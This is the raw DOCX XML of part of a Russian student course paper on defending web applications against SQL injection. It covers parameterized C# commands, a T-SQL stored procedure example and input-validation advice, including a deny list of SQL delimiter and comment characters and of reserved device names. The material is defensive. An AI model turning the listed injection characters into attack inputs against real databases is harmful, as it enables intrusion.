          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '123'</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должен стать чем-то вроде:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRPr="00BF7C2C" w:rsidRDefault="00FC4D17" w:rsidP="00BF7C2C">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r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * FROM Customers WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomerID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00A92A4F" w:rsidRDefault="008F0DAD" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заполнители добавляются раздельно и автоматически кодируются.</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Синтаксис параметризованных команд у различных поставщиков выглядит немного по-разному. В поставщике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предусматривается использованием именованных заполнителей (с уникальными именами). У поставщика OLE DB каждое жестко закодированное значение заменяется вопросительным знаком. В любом случае необходимо предоставить объект - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для каждого параметра, который вставляется в коллекцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command.Parameters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. При работе с поставщиком OLE DB следует убедиться, что параметры добавляются в том же порядке, в котором они появляются в строке SQL. Этого не требует поставщик данных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поскольку соответствие между параметрами и заполнителями задается с помощью имен.</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Если вы предпримете попытку атаки внедрением SQL с таким типом построения sql-запроса, то обнаружите, что она не вернет никаких записей. Причина в том, что ни одна запись не имеет значения текста sql-запроса, конечно, если запрос не к справочнику по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В любом случае, используя параметризованные команды, ни один вредоносный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>скрипт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, оправленный со стороны клиента не сможет выполниться.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="0057665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Пример</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создания</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параметризованной</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команды</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на языке C#.</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576652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>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("Insert Into Inventory  (</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xml:space="preserve">,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Values(@</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8F0DAD" w:rsidRPr="003B32C2" w:rsidRDefault="008F0DAD" w:rsidP="008F0DAD">
      <w:pPr>
        <w:spacing w:after="0" w:line="326" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="003B32C2" w:rsidRDefault="008F0DAD" w:rsidP="008F0DAD">
      <w:pPr>
        <w:spacing w:after="0" w:line="326" w:lineRule="atLeast"/>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ConnectionString</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 Добавить параметры</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cmd.Parameters.AddWithValue</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CustID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id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</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("@Make", make);</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("@Color", color);</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46706C" w:rsidRPr="009F0170" w:rsidRDefault="0046706C" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc420429537"/>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRDefault="008F0DAD" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc420854440"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2) Использование хранимых процедур</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00F0712A" w:rsidRDefault="008F0DAD" w:rsidP="00F0712A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0712A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вызов хранимых процедур</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Параметризованные команды — лишь небольшой шаг от команд в сторону полноценных хранимых процедур. Как известно, хранимая процедура представляет собой пакет из одного или более операторов SQL, сохраненный в базе данных.</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Хранимые процедуры подобны функциям в том, что они являются хорошо инкапсулированными блоками логики, которые могут принимать данные (через входные параметры) и возвращать данные (через результирующие наборы и выходные параметры). Хранимые процедуры обладают множеством преимуществ:</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Их легко сопровождать. Например, вы можете оптимизировать команды в хранимой процедуре без перекомпиляции приложения, использующего ее. Также они стандартизуют логику доступа к данным в одном месте — в базе данных, — облегчая ее многократное использование согласованным образом разными приложениями. (В терминах объектно-ориентированного программирования хранимые процедуры определяют интерфейс к базе данных.)</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Они позволяют реализовать более безопасное обращение с базой данных. Например, вы можете позволить учетной записи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, которая запускает ваш код ASP.NET, использовать определенные хранимые процедуры, но ограничить доступ к лежащим в их основе таблицам.</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Они могут повысить производительность. Поскольку хранимые процедуры упаковывают вместе множество операторов, вы можете выполнить огромный объем работы за одно обращение к серверу базы данных. Если база данных находится на другом компьютере, это значительно снижает затраты времени на решение сложных задач.</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В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предварительно компилируются все команды SQL, включая неподготовленные. Это значит, что вы используете преимущества компиляции независимо оттого, применяете хранимые процедуры или нет. Однако хранимые процедуры все равно имеют тенденцию повышать производительность, поскольку снижают вариантность SQL-операторов. Системам, использующим случайные операторы SQL, часто свойственно применение слегка отличающихся команд для решения похожих задач, что не позволяет серверу эффективно повторно использовать скомпилированные планы выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00576652" w:rsidRDefault="008F0DAD" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример создания хранимой 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eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>USE AdventureWorks2012;</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CREATE PROCEDURE HumanResources.uspGetEmployeesTest2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AS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SET NOCOUNT ON;</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r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w: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Department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FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>HumanResources.vEmployeeDepartmentHistory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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WHERE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AND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576652" w:rsidRDefault="008F0DAD" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример</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использования</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хранимой</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 xml:space="preserve"> command = new </w:t>
      </w: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cmd.CommandText</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StoredProcedureName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cmd.CommandType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CommandType.StoredProcedure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SqlDataReader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reader = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cmd.ExecuteReader</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w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>далее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идёт</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считывание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данных</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при</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помощи</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="006D3DB3" w:rsidRDefault="008F0DAD" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00800878" w:rsidRDefault="008F0DAD" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc420429538"/>
      <w:bookmarkStart w:id="17" w:name="_Toc420854441"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3)Проверка всех данных, вводимых пользователем</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00857179" w:rsidRDefault="008F0DAD" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практический все приложения или сайты, работающие с СУБД, обрабатывают данные, приходящие от клиент</w:t>
      </w:r>
      <w:r w:rsidR="004E6BC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">на сервер. Эти данные могут находиться в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странице, поле для ввода информации, теле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> запроса. Исходя из безопасности и поддержани</w:t>
      </w:r>
      <w:r w:rsidR="004E6BC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">я </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>целостности базы данных, необходимо проверять эти данные перед передачей их серверу БД. Список рекомендаций для предотвращения внедрения sql-кода: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1) Провер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>яй</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>те размер и тип вводимых данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и установите соответствующие ограничения. Это поможет предотвратить преднамеренное переполнение буфера. Можно установить ограничение на количество вводимых символов или установить соответствие на регулярное выражение.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2) Проверяйте содержимое строковых переменных и допускайте только ожидаемые значения. Отклоняйте записи, содержащие двоичные данные, управляющие последовательности и символы комментария. Это поможет предотвратить внедрение сценария и защитит от некоторых приемов атаки, использующих переполнение буфера.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3) При работе с XML-документами проверяйте все вводимые данные на соответствие схеме.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4) Никогда не создавайте инструкции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Transact-SQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> непосредственно из данных, вводимых пользователем.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5) В многоуровневых средах перед передачей в доверенную зону должны проверяться все данные. Данные, не прошедшие процесс проверки, следует отклонять и возвращать ошибку на предыдущий уровень.</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6) Внедрите многоэтапную проверку достоверности. Меры предосторожности, предпринятые против случайных пользователей-злоумышленников, могут оказаться неэффективными против организаторов преднамеренных атак. Рекомендуется проверять данные, вводимые </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>через пользовательский интерфейс, и далее во всех последующих точках пересечения границ доверенной зоны.</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Например, проверка данных в клиентском приложении может предотвратить простое внедрение сценария. Однако если следующий уровень предполагает, что вводимые данные уже были проверены, то любой злоумышленник, которому удастся обойти клиентскую систему, сможет получить неограниченный доступ к системе.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7) Не допускайте использование в полях следующих строк, из которых могут быть созданы имена файлов: AUX, CLOCK$, COM1–COM8, CON, CONFIG$, LPT1–LPT8, NUL и PRN.</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8) По возможности отклоняйте вводимые данные, содержащие следующие </w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>символы</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Разделител</w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> запросов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b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Разделитель строк символьных данных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c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Разделитель комментариев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d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Разделители комментариев. Текст, заключенный между символами /* и */, не обрабатывается сервером - /* ... */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670F38" w:rsidRDefault="00670F38" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc420429539"/>
      <w:bookmarkStart w:id="19" w:name="_Toc326105875"/>
      <w:bookmarkStart w:id="20" w:name="_Toc418778187"/>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bookmarkEnd w:id="18"/>
    <w:p w:rsidR="003B32C2" w:rsidRPr="009F0170" w:rsidRDefault="003B32C2" w:rsidP="003B32C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:p w:rsidR="004936B0" w:rsidRDefault="00670F38" w:rsidP="00020A8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B177A9" w:rsidRDefault="006D3775" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В ходе курсовой работы были</w:t>
      </w:r>
      <w:r w:rsidR="00D117CB" w:rsidRPr="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">созданы две версии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D117CB" w:rsidRPr="00D117CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
